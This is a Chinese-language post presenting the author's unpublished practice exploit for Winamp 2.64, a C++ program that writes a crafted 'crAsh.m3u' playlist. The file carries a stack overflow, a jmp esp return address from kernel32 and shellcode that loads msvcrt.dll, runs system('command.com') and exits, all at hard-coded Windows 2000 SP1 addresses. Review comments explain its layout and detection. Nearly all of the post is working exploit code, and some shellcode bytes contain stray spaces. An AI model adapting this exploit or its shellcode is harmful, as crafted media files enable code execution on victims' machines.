这是我以前练手写的winamp的一个exploit,没有发表过。 现在大概没有人还在用winamp 2.64了,只能做参考用了。
我的机子windows 2000 professional 5.00.2195 sp1
msvcrt.dll start 0x78000000
system 0x7801aaad
messagebox 0x77e0737e
loadlibrary 0x77e67273
ff,e4(jmp esp) 我找的是kernel32中的0x77e6898b
注上//sztcww的是需要你自己根据你的情况调整的
参考《ipxodi写的堆栈溢出系列讲座》 《一篇bugtraq关于winamp 6.4的讨论》

// winamp2.64 exploit.cpp : Defines the entry point for the console application.
//
/*winamp2.64 buffer overflow exploit
 * u can get a lovely dos window
 * if u can ,run arbitrary code
 *thank icefire */
#include "stdafx.h"

/*
 * Writes a single file, "crAsh.m3u", in the current directory and exits.
 *
 * The file is an Extended M3U playlist: an "#EXTM3U" header line followed by
 * one "#EXTINF:" line whose content is, in order, 269 'A' bytes, 8 filler
 * bytes (0xA0 0xA1 0x11 0x11 0x50 0x50 0x50 0x50), the 4 bytes of `eip`, and
 * the contents of `sploit`, ending with three newlines.  Nothing in this
 * program touches Winamp itself; the overflow the author describes happens
 * only when the generated playlist is opened by the vulnerable player.
 *
 * Every absolute address below (the `eip` bytes and the two marked //sztcww
 * inside `sploit`) is a fixed location in the author's Windows 2000 SP1
 * system DLLs, as listed in the notes above.  On any other build those
 * values point elsewhere, so the payload is not portable; this is also why
 * hard-coded-address payloads of this kind are defeated by randomised DLL
 * load addresses.
 *
 * Detection note: the generated file is easy to recognise as malformed --
 * its "#EXTINF:" line is several hundred bytes long, consists mostly of a
 * run of 'A', and contains non-printable bytes where a playlist would hold
 * a duration and a title.  A playlist parser that bounds the length it
 * copies from that line is not affected.
 *
 * Returns 0 unconditionally; argc/argv are unused.
 */
int main(int argc, char* argv[])
{
    // buffer receives 269 + 8 bytes plus the terminating NUL (278 bytes),
    // well inside its 500-byte size.
    char buffer[500];
    // Only the first 4 bytes are given; the remaining 4 are zero-initialised,
    // so the "%s" below emits exactly 4 bytes from eip.
    char eip[8] = "\x8b\x89\xe6\x77"; //sztcww kernel32 jmp esp
    // Payload bytes as supplied by the author; the three sections are labelled
    // by the author's own comments (LoadLibrary, "open dos", exit).
    char sploit[] =
        "\x55\x8B\xEC\x33\xC0"
        "\x50"
        "\x50"
        "\x50"
        "\xC6\x45\xF4\x4D"
        "\xC6\x45\xF5\x53"
        "\xC6\x45\xF6\x56"
        "\xC6\x45\xF7\x43"
        "\xC6\x45\xF8\x52"
        "\xC6\x45\xF9\x54"
        "\xC6\x45\xFA\x2E"
        "\xC6\x45\xFB\x44"
        "\xC6\x45\xFC\x4C"
        "\xC6\x45\xFD\x4C"
        "\xBA\x73\x72\xe6\x77"//sztcww my pc loadlibrary add is 0x77e67273
        "\x52"
        "\x8D\x45\xF4"
        "\x50"
        "\xFF\x55\xF0"
        //open dos
        "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2 E"
        "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF 4"
        "\x50"
        "\xB8\xad\xaa\x01\x78"//sztcww system in my pc is 0x7801aaad
        "\xFF\xD0"
        //exit
        "\x55"
        "\x8B\xEC"
        "\xBA\xFF\xFF\xFF\xFF"
        "\x81\xEA"
        "\xFB\xAA\xFF\x87"
        "\x52\x33\xC0\x50\xFF\x55\xFC"
        ;
    FILE *file;
    // NOTE(review): `x` is declared in the for-init but used after the loop.
    // That relies on the old MSVC scoping rule; standard C++ (and C99) limit
    // `x` to the loop body, so this does not compile on a conforming compiler.
    for(int x=0;x<269;x++)
    {
        buffer[x] ='A';
    }
    // Eight filler bytes appended after the 'A' run; the author gives no
    // explanation for the specific values.
    buffer[x] =0XA0; x++;
    buffer[x] =0xA1; x++;
    buffer[x] =0x11; x++;
    buffer[x] =0x11; x++;
    buffer[x] =0X50; x++;
    buffer[x] =0x50; x++;
    buffer[x] =0x50; x++;
    buffer[x] =0x50; x++;
    buffer[x]=0;
    // NOTE(review): fopen's result is never checked; if the file cannot be
    // created (read-only directory, permissions) the fprintf calls below
    // dereference a NULL FILE*.
    file = fopen("crAsh.m3u","wb");
    fprintf(file, "#EXTM3U\n");//here
    fprintf(file, "#EXTINF:");//here
    fprintf(file, "%s", buffer);
    fprintf(file, "%s", eip);
    // "%s" stops at the first NUL in sploit; the payload as written contains
    // none, so it is emitted whole.
    fprintf(file, "%s\n\n\n", sploit);
    fclose(file);
    printf("\t created file crAsh.m3u loaded with the exploit.\n");
    return 0;
}
--